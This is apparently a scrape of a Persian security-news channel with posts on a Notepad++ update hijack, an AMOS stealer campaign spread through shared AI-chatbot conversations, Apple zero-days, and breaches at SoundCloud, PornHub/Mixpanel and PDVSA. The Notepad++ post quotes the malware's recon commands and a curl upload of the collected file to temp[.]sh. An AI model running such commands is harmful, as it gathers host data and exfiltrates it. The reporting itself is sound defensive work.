🔴 ضعف امنیتی در بروزرسانی ++Notepad
نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه:
اگه مورد جدیدی باشه، یک فایل XML با محتویات زیر برمیگردونه:
اخیرا یکی از کاربران گزارش داده که WinGUp یک فایل در مسیر زیر ایجاد میکنه:
و یسری دستورات مرتبط با ریکان رو اجرا و در فایل a.txt ذخیره میکنه:
بعدش، autoupdater.exe این فایل رو از طریق curl.exe به temp[.]sh ارسال میکنه.
کاربرا 2 تا حدس میزنن: یا اینکه کاربر از یک نسخه ی آلوده استفاده میکنه (Malvertising) یا اینکه ترافیک بروزرسانی دستکاری شده.
محقق امنیتی Kevin Beaumont اعلام کرده که اوایل این ماه سه سازمان در شرق آسیا، از این طرق هک شدن و احتمال میده که هکرها از طریق دستکاری ترافیک و تغییر مقدار Location در XML، تونستن این کار انجام بدن.
با توجه به اینکه ترافیک این سایت بدلیل تعداد کاربراش قابل شناسایی هستش و همچنین مهاجم با قرار گرفتن در مسیر ISP میتونه ترافیک رو دستکاری کنه، 18 نوامبر، نسخه ی 8.8.8 منتشر شده که فقط بروزرسانی رو از گیتهاب میگرفت. (گیتهاب ترافیکش برای شناسایی سختتره - کاربراش زیادن)
9 دسامبر هم نسخه ی 8.8.9 منتشر شده که مانع نصب هر گونه بروزرسانی میشه که با گواهی امضای کد سازنده امضا نشده باشه.
توسعه دهنده ی ++Notepad هم اعلام کرده که تحقیقات برای مشخصکردن روش دقیق سرقت و دستکاری ترافیک ادامه داره. بعد از رسیدن به شواهد قطعی، کاربران مطلع خواهند شد.
توصیه شده، نسخه 8.8.9 رو از سایت اصلی بصورت دستی دانلود و نصب کنید./منبع
#آسیب_پذیری_امنیتی
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه:
https://notepad-plus-plus.org/update/getDownloadUrl.php?version=<versionnumber>
اگه مورد جدیدی باشه، یک فایل XML با محتویات زیر برمیگردونه:
<GUP>
<noscript/>
<NeedToBeUpdated>yes</NeedToBeUpdated>
<Version>8.8.8</Version>
<Location>https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.8/npp.8.8.8.Installer.exe</Location>
</GUP>
اخیرا یکی از کاربران گزارش داده که WinGUp یک فایل در مسیر زیر ایجاد میکنه:
%Temp%\AutoUpdater.exe
و یسری دستورات مرتبط با ریکان رو اجرا و در فایل a.txt ذخیره میکنه:
cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt
بعدش، autoupdater.exe این فایل رو از طریق curl.exe به temp[.]sh ارسال میکنه.
کاربرا 2 تا حدس میزنن: یا اینکه کاربر از یک نسخه ی آلوده استفاده میکنه (Malvertising) یا اینکه ترافیک بروزرسانی دستکاری شده.
محقق امنیتی Kevin Beaumont اعلام کرده که اوایل این ماه سه سازمان در شرق آسیا، از این طرق هک شدن و احتمال میده که هکرها از طریق دستکاری ترافیک و تغییر مقدار Location در XML، تونستن این کار انجام بدن.
با توجه به اینکه ترافیک این سایت بدلیل تعداد کاربراش قابل شناسایی هستش و همچنین مهاجم با قرار گرفتن در مسیر ISP میتونه ترافیک رو دستکاری کنه، 18 نوامبر، نسخه ی 8.8.8 منتشر شده که فقط بروزرسانی رو از گیتهاب میگرفت. (گیتهاب ترافیکش برای شناسایی سختتره - کاربراش زیادن)
9 دسامبر هم نسخه ی 8.8.9 منتشر شده که مانع نصب هر گونه بروزرسانی میشه که با گواهی امضای کد سازنده امضا نشده باشه.
توسعه دهنده ی ++Notepad هم اعلام کرده که تحقیقات برای مشخصکردن روش دقیق سرقت و دستکاری ترافیک ادامه داره. بعد از رسیدن به شواهد قطعی، کاربران مطلع خواهند شد.
توصیه شده، نسخه 8.8.9 رو از سایت اصلی بصورت دستی دانلود و نصب کنید./منبع
#آسیب_پذیری_امنیتی
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Community
autoupdater and connection temp.sh
Submission for any help regarding a finding that came through from AutoUpdater!? Malicious command seen: curl.exe -F "file=@a.txt" -s https://temp[.]sh/uploa...
❤8
🔴 کمپین جدید توزیع بدافزار از طریق سوء استفاده از هوش مصنوعی
محققای Huntress گزارش آلودگی از کاربران macOS با بدافزار AMOS (Atomic macOS Stealer) دریافت کردن و اومدن که بررسی کنن متوجه شدن که نه ایمیل فیشینگ در کارِ، نه نصب کننده آلوده و نه ClickFix بلکه فقط یک جستجوی ساده در گوگل و بعدش یک گفتگو با ChatGPT منجر به آلودگی شده.
در این کمپین بازیگران تهدید یسری گفتگوی آموزشی در چتباتها ایجاد میکنن، مثلا چطوری در macOS فضای دیسک رو پاک کنیم و این محتوا رو اشتراک گذاری میکنن. این محتوا معمولا توسط گوگل ایندکس و در نتایج جستجو نمایش داده میشه.
کاربری که مثلا مشکل فضای دیسک داره، با جستجو وارد یکی از این گفتگوها میشه و دستورات اون رو قدم به قدم اجرا میکنه. چرا؟ چون لینک مربوط به ChatGPT یا Grok هستش، بنابراین معتبره، قالب حرفه ای داره، زبان ارائه شده اطمینان بخش هستش و محتوای فنی قابل قبولی داره.
اما داخل این دستورات، لینکی قرار داره که با Base64 رمز شده و مربوط به دانلود بدافزار هستش.
با این روش بازیگر تهدید در سه گام: جستجو، کلیک، کپی پِست به هدفش میرسه.
محققا گفتن: این کمپین نشان دهنده تحولی بنیادین در مهندسی اجتماعی است. مهاجمان دیگه فقط از پلتفرمهای معتبر تقلید نمیکنن؛ بلکه فعالانه از خودِ این پلتفرمها استفاده میکنن و نتایج جستجو رو آلوده میکنن تا کمک مخربشان اولین چیزی باشه که قربانیان میبینن. بدافزار دیگه لازم نیست خودش رو شبیه یک نرمافزار تمیز جا بزنه، وقتی میتونه خودش رو شبیه یک راهنمای کمک رسان نشان بده.
اصطلاحا آلوده کردن نتایج هوش مصنوعی رو AI Poisoning میگن و بالا آوردن محتوای مخرب در موتورهای جستجو رو SEO Poisoning.
#بازیگران_تهدید #هوش_مصنوعی #مهندسی_اجتماعی
#AIPoisoning #SEOPoisoning #AI
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
محققای Huntress گزارش آلودگی از کاربران macOS با بدافزار AMOS (Atomic macOS Stealer) دریافت کردن و اومدن که بررسی کنن متوجه شدن که نه ایمیل فیشینگ در کارِ، نه نصب کننده آلوده و نه ClickFix بلکه فقط یک جستجوی ساده در گوگل و بعدش یک گفتگو با ChatGPT منجر به آلودگی شده.
در این کمپین بازیگران تهدید یسری گفتگوی آموزشی در چتباتها ایجاد میکنن، مثلا چطوری در macOS فضای دیسک رو پاک کنیم و این محتوا رو اشتراک گذاری میکنن. این محتوا معمولا توسط گوگل ایندکس و در نتایج جستجو نمایش داده میشه.
کاربری که مثلا مشکل فضای دیسک داره، با جستجو وارد یکی از این گفتگوها میشه و دستورات اون رو قدم به قدم اجرا میکنه. چرا؟ چون لینک مربوط به ChatGPT یا Grok هستش، بنابراین معتبره، قالب حرفه ای داره، زبان ارائه شده اطمینان بخش هستش و محتوای فنی قابل قبولی داره.
اما داخل این دستورات، لینکی قرار داره که با Base64 رمز شده و مربوط به دانلود بدافزار هستش.
با این روش بازیگر تهدید در سه گام: جستجو، کلیک، کپی پِست به هدفش میرسه.
محققا گفتن: این کمپین نشان دهنده تحولی بنیادین در مهندسی اجتماعی است. مهاجمان دیگه فقط از پلتفرمهای معتبر تقلید نمیکنن؛ بلکه فعالانه از خودِ این پلتفرمها استفاده میکنن و نتایج جستجو رو آلوده میکنن تا کمک مخربشان اولین چیزی باشه که قربانیان میبینن. بدافزار دیگه لازم نیست خودش رو شبیه یک نرمافزار تمیز جا بزنه، وقتی میتونه خودش رو شبیه یک راهنمای کمک رسان نشان بده.
اصطلاحا آلوده کردن نتایج هوش مصنوعی رو AI Poisoning میگن و بالا آوردن محتوای مخرب در موتورهای جستجو رو SEO Poisoning.
#بازیگران_تهدید #هوش_مصنوعی #مهندسی_اجتماعی
#AIPoisoning #SEOPoisoning #AI
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Huntress
AI-Poisoning & AMOS Stealer: How Trust Became the Biggest Mac Threat | Huntress
Attackers are exploiting user trust in AI and aggressive SEO to deliver an evolved Atomic macOS Stealer. Learn why this social engineering tradecraft bypasses traditional network controls and the future of macOS infostealer defense.
❤10
🔴 انتشار چهارمین نسخه ی Kali Linux برای سال 2025
چهارمین نسخه ی Kali Linux برای سال 2025 با اصلاح یسری باگ و بهبود در بخش های مختلف و اضافه شدن 3 ابزار جدید منتشر شد. در این پست نگاهی به این تغییرات جدید انداختیم.
#کالی_لینوکس #لینوکس
#KaliLinux #Linux #InfoSec
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
چهارمین نسخه ی Kali Linux برای سال 2025 با اصلاح یسری باگ و بهبود در بخش های مختلف و اضافه شدن 3 ابزار جدید منتشر شد. در این پست نگاهی به این تغییرات جدید انداختیم.
#کالی_لینوکس #لینوکس
#KaliLinux #Linux #InfoSec
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤8
🔴 یک بازیگر تهدید دیتابیسی از اطلاعات ایرانی ها رو برای فروش در یکی از فرومهای فروش داده ارائه کرده.
این دیتابیس حاوی 69,081,743 خط و شامل داده های زیر است :
- نام کامل
- تاریخ تولد
- کد ملی
- کدپستی
- تلفن
- آدرس
صحت داده های نمونه رو تایید کردن.
طی تماسی که داشتم گفتن از یک سرور دولتی بوده.
با توجه به اینکه ایران از بس دیتا بیرون اومده که میشه از این دیتاهای افشاء شده دیتای جدید ساخت، نزدیکترین دیتابیس به این داده ها مربوط به مخابرات هستش که قبلا تیم لیکفا صحت اون رو تایید نکرده. از طرفی بازیگر تهدید هم در فروم مربوطه اعتبار داره.
⚠️ منبع رسمی این لیک رو تایید یا تکذیب نکرده.
#ایران #افشای_اطلاعات #بازیگران_تهدید
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
این دیتابیس حاوی 69,081,743 خط و شامل داده های زیر است :
- نام کامل
- تاریخ تولد
- کد ملی
- کدپستی
- تلفن
- آدرس
صحت داده های نمونه رو تایید کردن.
طی تماسی که داشتم گفتن از یک سرور دولتی بوده.
با توجه به اینکه ایران از بس دیتا بیرون اومده که میشه از این دیتاهای افشاء شده دیتای جدید ساخت، نزدیکترین دیتابیس به این داده ها مربوط به مخابرات هستش که قبلا تیم لیکفا صحت اون رو تایید نکرده. از طرفی بازیگر تهدید هم در فروم مربوطه اعتبار داره.
⚠️ منبع رسمی این لیک رو تایید یا تکذیب نکرده.
#ایران #افشای_اطلاعات #بازیگران_تهدید
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤17
🔴 اپل جمعه 12 دسامبر، بروزرسانی رو منتشر و 51 آسیب پذیری رو در محصولات مختلفش اصلاح کرده. دو تا از آسیب پذیری ها زیرودی بودن و در حملات پیچیده ای مورد اکسپلویت قرار گرفتن:
- آسیب پذیری CVE-2025-43529: از نوع use-after-free و در WebKit هستش. مهاجم از طریق محتوای وب مخرب میتونه RCE داشته باشه. توسط محققای گوگل کشف شده.
- آسیب پذیری CVE-2025-14174: از نوع خرابی حافظه و در WebKit هستش. توسط محققای گوگل و اپل کشف شده.
محصولات تحت تاثیر:
نسخه های اصلاح شده:
روز چهارشنبه هم گوگل یک آسیب پذیری زیرودی و بدون شناسه رو در کروم اصلاح کرده بود که الان مشخص شده آسیب پذیری CVE-2025-14174 و از نوع Out-of-bounds در ANGLE هستش.
احتمال میدن این آسیب پذیریها مرتبط با حملات هدفمند جاسوس افزارهای تجاری باشه.
نکته 🇮🇷❤️ : آسیب پذیری های CVE-2025-43541 و CVE-2025-43501 و CVE-2025-43509 در محصولات مختلف اپل توسط آقای حسین لطفی از ترندمیکرو کشف و گزارش شده.
#آسیب_پذیری_امنیتی #اپل
#Apple #CVE #0day
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
- آسیب پذیری CVE-2025-43529: از نوع use-after-free و در WebKit هستش. مهاجم از طریق محتوای وب مخرب میتونه RCE داشته باشه. توسط محققای گوگل کشف شده.
- آسیب پذیری CVE-2025-14174: از نوع خرابی حافظه و در WebKit هستش. توسط محققای گوگل و اپل کشف شده.
محصولات تحت تاثیر:
iPhone 11 and later
iPad Pro 12.9-inch (3rd generation and later)
iPad Pro 11-inch (1st generation and later)
iPad Air (3rd generation and later)
iPad (8th generation and later)
iPad mini (5th generation and later)
نسخه های اصلاح شده:
OS 26.2 and iPadOS 26.2, iOS 18.7.3 and iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2.
روز چهارشنبه هم گوگل یک آسیب پذیری زیرودی و بدون شناسه رو در کروم اصلاح کرده بود که الان مشخص شده آسیب پذیری CVE-2025-14174 و از نوع Out-of-bounds در ANGLE هستش.
احتمال میدن این آسیب پذیریها مرتبط با حملات هدفمند جاسوس افزارهای تجاری باشه.
نکته 🇮🇷❤️ : آسیب پذیری های CVE-2025-43541 و CVE-2025-43501 و CVE-2025-43509 در محصولات مختلف اپل توسط آقای حسین لطفی از ترندمیکرو کشف و گزارش شده.
#آسیب_پذیری_امنیتی #اپل
#Apple #CVE #0day
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Apple Support
Apple security releases - Apple Support
This document lists security updates and Rapid Security Responses for Apple software.
❤10
🔴 لیست CWE TOP 25 برای سال 2025
سازمان MITRE لیست 25 مورد از خطرناکترین نقاط ضعف نرمافزاری امسال رو در قالب CWE Top 25 منتشر کرده، که در این پست بررسی کردیم.
#آسیب_پذیری_امنیتی
#Mitre #CWE #CWEtop25
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
سازمان MITRE لیست 25 مورد از خطرناکترین نقاط ضعف نرمافزاری امسال رو در قالب CWE Top 25 منتشر کرده، که در این پست بررسی کردیم.
#آسیب_پذیری_امنیتی
#Mitre #CWE #CWEtop25
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤9
OnHex
🔴 افشای هویت Rey از SLSH در این پست گزارش اخیر KrebsOnSecurity در خصوص نحوه ی پیدا کردن یکی از اعضای اصلی SLSH و مصاحبه کوتاه با ایشون رو ارائه کردیم. سرویسهای معرفی شده در این گزارش، به موتورهای جستجو برای محققین امنیت سایبری هم اضافه شد. #باج_افزار #داستان_هکرها…
🔴 گروه هکری ShinyHunters، مسئول هک SoundCloud
اخیرا دسترسی به پلتفرم SoundCloud از طریق VPN با مشکل مواجه شده بود که مشخص شد، علت این اختلال بدلیل حمه سایبری بوده. هکرها به این پلتفرم نفوذ کردن و تونستن بخشی از دیتای این شرکت رو بدزدن.
پلتفرم SoundCloud این هک رو تایید و اعلام کرده که هکرها تونستن حدود 20 درصد از اطلاعات کاربران ( حدود 28 میلیون کاربر) این پلتفرم، که شامل ایمیل و اطلاعات عمومی پروفایل کاربران میشه رو بدزدن.
برای پاسخ به این هک، اقداماتی انجام دادن که طی اون دسترسی از طریق VPN، با خطای 403 مواجه شده.
بعد از هک، یک حمله ی DOS هم روی این پلتفرم انجام شده./ منبع
#بازیگران_تهدید
#SoundCloud #ShinyHunters
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
اخیرا دسترسی به پلتفرم SoundCloud از طریق VPN با مشکل مواجه شده بود که مشخص شد، علت این اختلال بدلیل حمه سایبری بوده. هکرها به این پلتفرم نفوذ کردن و تونستن بخشی از دیتای این شرکت رو بدزدن.
پلتفرم SoundCloud این هک رو تایید و اعلام کرده که هکرها تونستن حدود 20 درصد از اطلاعات کاربران ( حدود 28 میلیون کاربر) این پلتفرم، که شامل ایمیل و اطلاعات عمومی پروفایل کاربران میشه رو بدزدن.
برای پاسخ به این هک، اقداماتی انجام دادن که طی اون دسترسی از طریق VPN، با خطای 403 مواجه شده.
بعد از هک، یک حمله ی DOS هم روی این پلتفرم انجام شده./ منبع
#بازیگران_تهدید
#SoundCloud #ShinyHunters
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
BleepingComputer
SoundCloud confirms breach after member data stolen, VPN access disrupted
Audio streaming platform SoundCloud has confirmed that outages and VPN connection issues over the past few days were caused by a security breach in which threat actors stole a database exposing users' email addresses and profile information.
❤3
OnHex
🔴 شرکت OpenAI گزارشی منتشر کرده در خصوص یک حادثه ی امنیت سایبری. اولا این رخداد امنیتی کاربرانی رو تحت تاثیر قرار میده که از platform.openai.com استفاده میکنن. این پلتفرم مختص کسانی است که از OpenAI API استفاده میکنن. مثلا برنامه نویسها و توسعه دهندگان. بنابراین…
🔴 پلتفرم PornHub اعلام کرده که سوابق جستجو و تماشای کاربران Premium این سرویس در نقض داده اخیر Mixpanel توسط ShinyHunters به سرقت رفته.
هفته گذشته، PornHub اعلام کرد که تحت تأثیر یک رخداد امنیتی در شرکت تحلیل داده Mixpanel قرار گرفته. Mixpanel در تاریخ ۸ نوامبر ۲۰۲۵ و در پی یک حمله فیشینگ پیامکی (Smishing)، دچار نقض امنیتی شده که به مهاجمان اجازه نفوذ به سیستمهای این شرکت رو داده.
کمپانی PornHub اعلام کرده که از سال ۲۰۲۱ تاکنون با Mixpanel همکاری نداشته. موضوعی که نشان میده دادههای سرقتشده، اطلاعات تحلیلی قدیمی مربوط به سال ۲۰۲۱ یا قبل از اون هستن.
کمپانی Mixpanel هم اعلام کرده که این نقض امنیتی تنها تعداد محدودی از مشتریان رو تحت تأثیر قرار داده و قبلا شرکتهای OpenAI و CoinTracker هم اعلام کرده بودن که تحت تأثیر این رخداد بودن. همچنین در خصوص این نقض PornHub گفته ما هیچ نشانهای پیدا نکردیم که این دادهها در جریان حادثه امنیتی نوامبر ۲۰۲۵ یا در زمان دیگری از Mixpanel سرقت شده باشند. این دادهها آخرین بار در سال ۲۰۲۳ توسط یک حساب کاربری قانونی متعلق به شرکت مادر PornHub مورد دسترسی قرار گرفتن. اگه این دادهها اکنون در اختیار یک طرف غیرمجاز باشه، ما معتقد نیستیم که این موضوع نتیجه یک حادثه امنیتی در Mixpanel باشه.
گروه هکری هم از هفته گذشته شروع به اخاذی از قربانیان Mixpanel کرده و براشون ایمیل ارسال میکنه. در درخواست اخاذی ارسالشده به PornHub، ادعا کردن که ۹۴ گیگابایت داده شامل بیش از ۲۰۰ میلیون رکورد اطلاعات شخصی رو در جریان نقض Mixpanel به سرقت بردن.
نمونه ی بررسی شده، حاوی حجم قابلتوجهی از اطلاعات حساس بوده که کاربران بهاحتمال زیاد تمایلی به افشای عمومی اونا ندارن. این اطلاعات شامل:
- آدرس ایمیل کاربر Premium
- نوع فعالیت (شامل تماشای ویدیو، دانلود ویدیو یا مشاهده یک کانال توسط مشترک PornHub، سوابق جستجو)
- موقعیت مکانی
- آدرس URL و نام ویدیو
- کلیدواژههای مرتبط با ویدیو
- زمان وقوع رویداد
#بازیگران_تهدید #نقض_داده
#Mixpanel #PornHub #ShinyHunters
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
هفته گذشته، PornHub اعلام کرد که تحت تأثیر یک رخداد امنیتی در شرکت تحلیل داده Mixpanel قرار گرفته. Mixpanel در تاریخ ۸ نوامبر ۲۰۲۵ و در پی یک حمله فیشینگ پیامکی (Smishing)، دچار نقض امنیتی شده که به مهاجمان اجازه نفوذ به سیستمهای این شرکت رو داده.
کمپانی PornHub اعلام کرده که از سال ۲۰۲۱ تاکنون با Mixpanel همکاری نداشته. موضوعی که نشان میده دادههای سرقتشده، اطلاعات تحلیلی قدیمی مربوط به سال ۲۰۲۱ یا قبل از اون هستن.
کمپانی Mixpanel هم اعلام کرده که این نقض امنیتی تنها تعداد محدودی از مشتریان رو تحت تأثیر قرار داده و قبلا شرکتهای OpenAI و CoinTracker هم اعلام کرده بودن که تحت تأثیر این رخداد بودن. همچنین در خصوص این نقض PornHub گفته ما هیچ نشانهای پیدا نکردیم که این دادهها در جریان حادثه امنیتی نوامبر ۲۰۲۵ یا در زمان دیگری از Mixpanel سرقت شده باشند. این دادهها آخرین بار در سال ۲۰۲۳ توسط یک حساب کاربری قانونی متعلق به شرکت مادر PornHub مورد دسترسی قرار گرفتن. اگه این دادهها اکنون در اختیار یک طرف غیرمجاز باشه، ما معتقد نیستیم که این موضوع نتیجه یک حادثه امنیتی در Mixpanel باشه.
گروه هکری هم از هفته گذشته شروع به اخاذی از قربانیان Mixpanel کرده و براشون ایمیل ارسال میکنه. در درخواست اخاذی ارسالشده به PornHub، ادعا کردن که ۹۴ گیگابایت داده شامل بیش از ۲۰۰ میلیون رکورد اطلاعات شخصی رو در جریان نقض Mixpanel به سرقت بردن.
نمونه ی بررسی شده، حاوی حجم قابلتوجهی از اطلاعات حساس بوده که کاربران بهاحتمال زیاد تمایلی به افشای عمومی اونا ندارن. این اطلاعات شامل:
- آدرس ایمیل کاربر Premium
- نوع فعالیت (شامل تماشای ویدیو، دانلود ویدیو یا مشاهده یک کانال توسط مشترک PornHub، سوابق جستجو)
- موقعیت مکانی
- آدرس URL و نام ویدیو
- کلیدواژههای مرتبط با ویدیو
- زمان وقوع رویداد
#بازیگران_تهدید #نقض_داده
#Mixpanel #PornHub #ShinyHunters
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
BleepingComputer
PornHub extorted after hackers steal Premium member activity data
Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach.
❤12
🔴 شرکت Petróleos de Venezuela (PDVSA) که شرکت نفت دولتی ونزوئلا هستش، شنبه مورد حمله سایبری قرار گرفت.
دولت در بیانیه ای اعلام کرد که به لطف تخصص نیروی انسانی PDVSA، بخشهای عملیاتی به هیچ وجه تحت تأثیر قرار نگرفته و حمله صرفاً به سامانههای اداری محدود بود و آمریکا و توطئهگران داخلی رو مسئول طراحی این حمله دونسته و اون رو بخشی از تلاشی برای تضعیف ثبات ملی عنوان کرده و این اقدام تهاجمی رو بخشی از راهبرد علنی دولت آمریکا برای تصاحب نفت ونزوئلا از طریق زور و دزدی دریایی معرفی کرد.
با این حال، بر اساس یک یادداشت داخلی که بلومبرگ اون رو مشاهده کرده، PDVSA به کارکنان عملیاتی و اداری دستور داده بود که از شبکه جدا بشن و رایانههای خودشون رو خاموش کنن. سه منبع آگاه از این وضعیت هم به بلومبرگ گفتن که سامانههای شبکه PDVSA که مدیریت پایانه اصلی نفت خام کشور رو بر عهده دارن، تا روز دوشنبه همچنان از دسترس خارج بودن.
رویترز هم این موضوع رو در گزارشی با استناد به یک منبع داخلی تأیید کرد که گفته: هیچ محمولهای تحویل داده نمیشه، تمام سامانهها از کار افتادن./ منبع
#حمله_سایبری #ونزوئلا
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
دولت در بیانیه ای اعلام کرد که به لطف تخصص نیروی انسانی PDVSA، بخشهای عملیاتی به هیچ وجه تحت تأثیر قرار نگرفته و حمله صرفاً به سامانههای اداری محدود بود و آمریکا و توطئهگران داخلی رو مسئول طراحی این حمله دونسته و اون رو بخشی از تلاشی برای تضعیف ثبات ملی عنوان کرده و این اقدام تهاجمی رو بخشی از راهبرد علنی دولت آمریکا برای تصاحب نفت ونزوئلا از طریق زور و دزدی دریایی معرفی کرد.
با این حال، بر اساس یک یادداشت داخلی که بلومبرگ اون رو مشاهده کرده، PDVSA به کارکنان عملیاتی و اداری دستور داده بود که از شبکه جدا بشن و رایانههای خودشون رو خاموش کنن. سه منبع آگاه از این وضعیت هم به بلومبرگ گفتن که سامانههای شبکه PDVSA که مدیریت پایانه اصلی نفت خام کشور رو بر عهده دارن، تا روز دوشنبه همچنان از دسترس خارج بودن.
رویترز هم این موضوع رو در گزارشی با استناد به یک منبع داخلی تأیید کرد که گفته: هیچ محمولهای تحویل داده نمیشه، تمام سامانهها از کار افتادن./ منبع
#حمله_سایبری #ونزوئلا
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
BleepingComputer
Cyberattack disrupts Venezuelan oil giant PDVSA's operations
Petróleos de Venezuela (PDVSA), Venezuela's state-owned oil company, was hit by a cyberattack over the weekend that disrupted its export operations.
❤4
🔴 محققای ACROS Security اخیرا اومدن آسیب پذیری CVE-2025-59230 رو بررسی کردن که در سرویس RasMan ویندوز هستش و امکان افزایش امتیاز به SYSTEM رو به مهاجم میده. این آسیب پذیری که در حملاتی مورد اکسپلویت قرار گرفته بود، در بروزرسانی اکتبر اصلاح شد.
در بررسی جدید متوجه یک آسیب پذیری 0day از نوع DoS شدن که منجر به بسته شدن این سرویس میشه. این آسیب پذیری فعلا CVE نگرفته.
سرویس RasMan یک سرویس حیاتی در ویندوز هستش که بصورت خودکار با سطح دسترسی SYSTEM اجرا میشه و مسئول مدیریت VPN، پروتکل PPPoE و سایر اتصالالات شبکه از راه دور هستش.
نکته ای که وجود داره، برای اینکه بتونیم CVE-2025-59230 رو اکسپلویت کنیم، باید سرویس RasMan رو غیرفعال کنیم. بنابراین الان مهاجمین با زنجیره کردن این دو آسیب پذیری، میتونن RasMan رو غیرفعال و از طریق CVE-2025-59230، افزایش امتیاز بدن.
مایکروسافت گفته که این آسیب پذیری جدید رو در بروزرسانی های آتی اصلاح میکنه. همچنین کسانی که بروزرسانی اکتبر رو اعمال کردن، تحت تاثیر افزایش امتیاز نیستن.
با این حال تا زمان انتشار اصلاحیه، ACROS Security از طریق سرویس میکروپچینگ 0Patch، وصلههای امنیتی غیررسمی و رایگان رو برای این آسیبپذیری زیرودی RasMan در تمامی نسخههای آسیبپذیر ویندوز ارائه میده./ منبع
#ویندوز #مایکروسافت
#RasMan #Microsoft #Windows #0day
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
در بررسی جدید متوجه یک آسیب پذیری 0day از نوع DoS شدن که منجر به بسته شدن این سرویس میشه. این آسیب پذیری فعلا CVE نگرفته.
سرویس RasMan یک سرویس حیاتی در ویندوز هستش که بصورت خودکار با سطح دسترسی SYSTEM اجرا میشه و مسئول مدیریت VPN، پروتکل PPPoE و سایر اتصالالات شبکه از راه دور هستش.
نکته ای که وجود داره، برای اینکه بتونیم CVE-2025-59230 رو اکسپلویت کنیم، باید سرویس RasMan رو غیرفعال کنیم. بنابراین الان مهاجمین با زنجیره کردن این دو آسیب پذیری، میتونن RasMan رو غیرفعال و از طریق CVE-2025-59230، افزایش امتیاز بدن.
مایکروسافت گفته که این آسیب پذیری جدید رو در بروزرسانی های آتی اصلاح میکنه. همچنین کسانی که بروزرسانی اکتبر رو اعمال کردن، تحت تاثیر افزایش امتیاز نیستن.
با این حال تا زمان انتشار اصلاحیه، ACROS Security از طریق سرویس میکروپچینگ 0Patch، وصلههای امنیتی غیررسمی و رایگان رو برای این آسیبپذیری زیرودی RasMan در تمامی نسخههای آسیبپذیر ویندوز ارائه میده./ منبع
#ویندوز #مایکروسافت
#RasMan #Microsoft #Windows #0day
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
0Patch
Free Micropatches for Windows Remote Access Connection Manager DoS (0day)
During our investigation of CVE-2025-59230 , a Windows Remote Access Connection Manager elevation of privilege vulnerability that was patc...
❤4
🔴 گروه هکری حنظله، مدعی هک گوشی iPhone 13، نفتالی بنت نخست وزیر اسبق اسرائیل شده و برای این ادعاش، یسری چت، شماره تلفن، ویدیو و ... منتشر کرده.
دفتر نفتالی بنت در پاسخ اعلام کرده: این موضوع توسط سازمانهای امنیتی و سایبری مربوطه در حال رسیدگی است. این دستگاه در حال حاضر مورد استفاده قرار نمیگیرد.
#اخبار_سایبری_جنگ_ایران_اسرائیل #حنظله
#Handala
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
دفتر نفتالی بنت در پاسخ اعلام کرده: این موضوع توسط سازمانهای امنیتی و سایبری مربوطه در حال رسیدگی است. این دستگاه در حال حاضر مورد استفاده قرار نمیگیرد.
#اخبار_سایبری_جنگ_ایران_اسرائیل #حنظله
#Handala
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤19
🔴 تلویزیونهای هوشمند امروزی، دیگه فقط به اپلیکیشنهای مختلف استریم قانع نیستن. اونا به دستگاههای دیگه داخل خانه متصل میشن، اونارو کنترل میکنن، امکان برقراری تماسهای ویدیویی رو فراهم میکنن و انواع اپلیکیشنها و قابلیتها رو اجرا میکنن. بنابراین اطلاعات شخصی زیادی رو در اختیار شرکتهای سازنده تلویزیون میزاریم.
دادستان کل ایالت تگزاس، کن پکستون، اعلام کرده که علیه ۵ شرکت از بزرگترین سازندگان تلویزیون در جهان شکایت حقوقی ثبت کرده: سامسونگ، سونی، الجی، هایسنس و TCL.
به گفته ایشون، تمام این شرکتها از طریق فناوری بنام Automated Content Recognition (ACR) یا تشخیص خودکار محتوا، اقدام به جمعآوری اطلاعات کاربران میکنن.
طبق ادعای پکستون، این فناوری قادر هر ۵۰۰ میلیثانیه از محتوایی که کاربر در حال تماشاست اسکرینشات بگیره و این اطلاعات رو بدون رضایت کاربر برای شرکت سازنده ارسال کنه. شرکتهای سازنده تلویزیون این اطلاعات رو میفروشن یا از اونا برای نمایش تبلیغات هدفمند و شخصیسازیشده استفاده میکنن.
ایشون همچنین مدعی شده که از نظر فنی، این فناوری امنیت اطلاعات خصوصی کاربران رو به خطر میندازه. چون ممکنه از پسوردها، اطلاعات بانکی و سایر دادههای حساس کاربران هم اسکرینشات بگیرن.
